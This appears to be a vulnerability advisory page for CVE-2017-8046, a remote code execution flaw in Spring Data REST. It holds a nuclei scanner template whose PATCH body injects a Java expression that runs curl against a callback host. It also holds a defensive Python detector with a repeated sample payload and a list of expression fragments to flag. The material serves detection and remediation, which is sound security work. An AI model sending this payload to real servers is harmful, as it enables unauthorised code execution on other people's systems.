CVE-2017-8046: Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution

Date: 2025-08-01 | Affected software: Spring Data REST | PoC: public

Vulnerability description

Spring Data REST before 2.6.9 and before 3.0.1, and Spring Boot before 1.5.9 and before 2.0 M6, contain a remote code execution vulnerability: when the server processes a malicious PATCH request carrying crafted JSON data, an attacker can execute arbitrary Java code. Exploitation requires only sending such a PATCH request.

PoC code [public]

id: CVE-2017-8046

info:
  name: Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution
  author: domwhewell-sage
  severity: critical
  description: |
    Spring Data REST < 2.6.9 and 3.0.1, Spring Boot < 1.5.9 and 2.0 M6 contain a remote code execution caused by processing malicious PATCH requests with crafted JSON data, letting attackers execute arbitrary Java code, exploit requires sending malicious PATCH requests.
  impact: |
    Malicious PATCH requests submitted to servers using Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1) and Spring Boot versions prior to 1.5.9, 2.0 M6 can use specially crafted JSON data to run arbitrary Java code.
  remediation: |
    To remediate this vulnerability, update to Spring Data REST version 2.6.9 or later, or 3.0.1 or later, and Spring Boot version 1.5.9 or later, or 2.0 M6 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-8046
    - https://spring.io/security/cve-2017-8046
    - https://access.redhat.com/errata/RHSA-2018:2405
    - https://www.exploit-db.com/exploits/44289/
    - https://github.com/jkutner/spring-break-cve-2017-8046
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-8046
    cwe-id: CWE-20
    epss-score: 0.93302
    epss-percentile: 0.99804
    cpe: cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*
  metadata:
    vendor: vmware
    product: spring_boot
    shodan-query: http.title:"eureka"
    fofa-query: title="eureka"
    google-query: intitle:"eureka"
  tags: cve,cve2017,pivotal,springboot,pivotal_software
flow: |
  http(1)
  set("endpoint", iterate(template.endpoint)[0])
  http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    max-redirects: 3

    matchers-condition: and
    matchers:
      - type: word
        internal: true
        part: header
        words:
          - "application/json"
          - "application/hal+json"
          - "application/vnd.spring-boot.actuator"
        condition: or

      - type: word
        internal: true
        part: body
        words:
          - '"_embedded"'
          - '"_links"'
          - '"page"'
          - '"size"'
        condition: or

    extractors:
      - type: regex
        name: endpoint
        part: body
        group: 1
        internal: true
        regex:
          - '"href"\s*:\s*"([^"]+)\{\?page,size,sort\}"'

  - method: PATCH
    path:
      - "{{endpoint}}/1"
    headers:
      Content-Type: application/json-patch+json
    body: |
      [
        {
          "op": "replace",
          "path": "T(java.lang.Runtime).getRuntime().exec(\"curl {{interactsh-url}}\").x",
          "value": "CVE-2017-8046"
        }
      ]

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: body
        words:
          - "org.springframework"
# digest: 4a0a004730450220459240b5a36b3585796b7411ff3e3a778911bed9cb57874a860fda578b272ef9022100d3a32265b67bcd8bb66fd756d237c10d18b573953a7d21c3b93ffeeb3fe836e8:922c64590222798bb761d5b6d8e72950
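The vulnerability description and the PATCH request in the template above turn on one detail: a JSON Patch "path" is supposed to be an RFC 6901 JSON Pointer (empty, or a sequence of "/"-prefixed tokens), and the payload shown is not one. A defender who cannot upgrade immediately, or who wants to find exploitation attempts in request logs, can therefore check every "path" (and "from") member of an application/json-patch+json body against the JSON Pointer grammar and flag anything else. The following Python is an added example written for this page; it is not part of the nuclei template, of Spring Data REST, or of any of the referenced projects. The request records, URLs and the "callback.invalid" host are constructed sample data, and the SpEL fragments in _SPEL_HINTS only label a finding, the decision is made by the grammar check.

```python
import json
import re

# RFC 6901 grammar: json-pointer = *( "/" reference-token ); a "~" must be followed by 0 or 1.
_JSON_POINTER = re.compile(r'(/([^/~]|~[01])*)*')

# Fragments of Spring Expression Language syntax that can never occur in a JSON Pointer.
# They only annotate a finding; rejection is decided by the grammar check above.
_SPEL_HINTS = ("T(", "#{", "${", ".getRuntime(", ".exec(", "new ")


def is_json_pointer(path: str) -> bool:
    """True if path conforms to RFC 6901 (empty string, or every token starts with '/')."""
    return _JSON_POINTER.fullmatch(path) is not None


def inspect_patch_body(body: str) -> list:
    """Return one finding dict per JSON Patch operation whose path/from is not a JSON Pointer."""
    try:
        ops = json.loads(body)
    except json.JSONDecodeError:
        return [{"index": None, "reason": "body is not valid JSON"}]
    if not isinstance(ops, list):
        return [{"index": None, "reason": "JSON Patch body must be an array of operations"}]

    findings = []
    for i, op in enumerate(ops):
        if not isinstance(op, dict):
            findings.append({"index": i, "reason": "operation is not an object"})
            continue
        # "path" is mandatory for every operation; "from" only exists for move/copy.
        for key in ("path", "from"):
            if key not in op:
                if key == "path":
                    findings.append({"index": i, "reason": "missing path"})
                continue
            value = op[key]
            if not isinstance(value, str) or not is_json_pointer(value):
                findings.append({
                    "index": i,
                    "key": key,
                    "reason": f"{key} is not an RFC 6901 JSON Pointer",
                    "spel_hints": [h for h in _SPEL_HINTS if isinstance(value, str) and h in value],
                })
    return findings


def scan_requests(requests: list) -> list:
    """Apply inspect_patch_body to PATCH requests whose Content-Type is application/json-patch+json."""
    flagged = []
    for req in requests:
        if req["method"] != "PATCH":
            continue
        content_type = req["headers"].get("Content-Type", "")
        if "json-patch+json" not in content_type:
            continue
        findings = inspect_patch_body(req["body"])
        if findings:
            flagged.append({"url": req["url"], "findings": findings})
    return flagged


# Constructed sample traffic (not captured from any real system). The second request mirrors
# the shape of the PATCH body in the template above; "callback.invalid" is a placeholder host.
SAMPLE_REQUESTS = [
    {
        "method": "PATCH",
        "url": "/persons/1",
        "headers": {"Content-Type": "application/json-patch+json"},
        "body": '[{"op": "replace", "path": "/firstName", "value": "Alice"}]',
    },
    {
        "method": "PATCH",
        "url": "/persons/1",
        "headers": {"Content-Type": "application/json-patch+json"},
        "body": json.dumps([
            {"op": "replace", "path": "/lastName", "value": "Smith"},
            {"op": "replace",
             "path": 'T(java.lang.Runtime).getRuntime().exec("curl callback.invalid").x',
             "value": "CVE-2017-8046"},
        ]),
    },
    {
        # JSON Merge Patch is a different media type and is not covered by this check.
        "method": "PATCH",
        "url": "/persons/1",
        "headers": {"Content-Type": "application/merge-patch+json"},
        "body": '{"firstName": "Bob"}',
    },
]

if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print(hit)
```

Only the second sample request is flagged: its first operation is a legitimate pointer, its second is rejected purely because it does not start with "/", and the SpEL hints are attached for the analyst. The same function can sit in a reverse proxy or WAF rule to return 400 before the body reaches an unpatched Spring Data REST instance; upgrading to the fixed versions named in the remediation remains the real fix.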
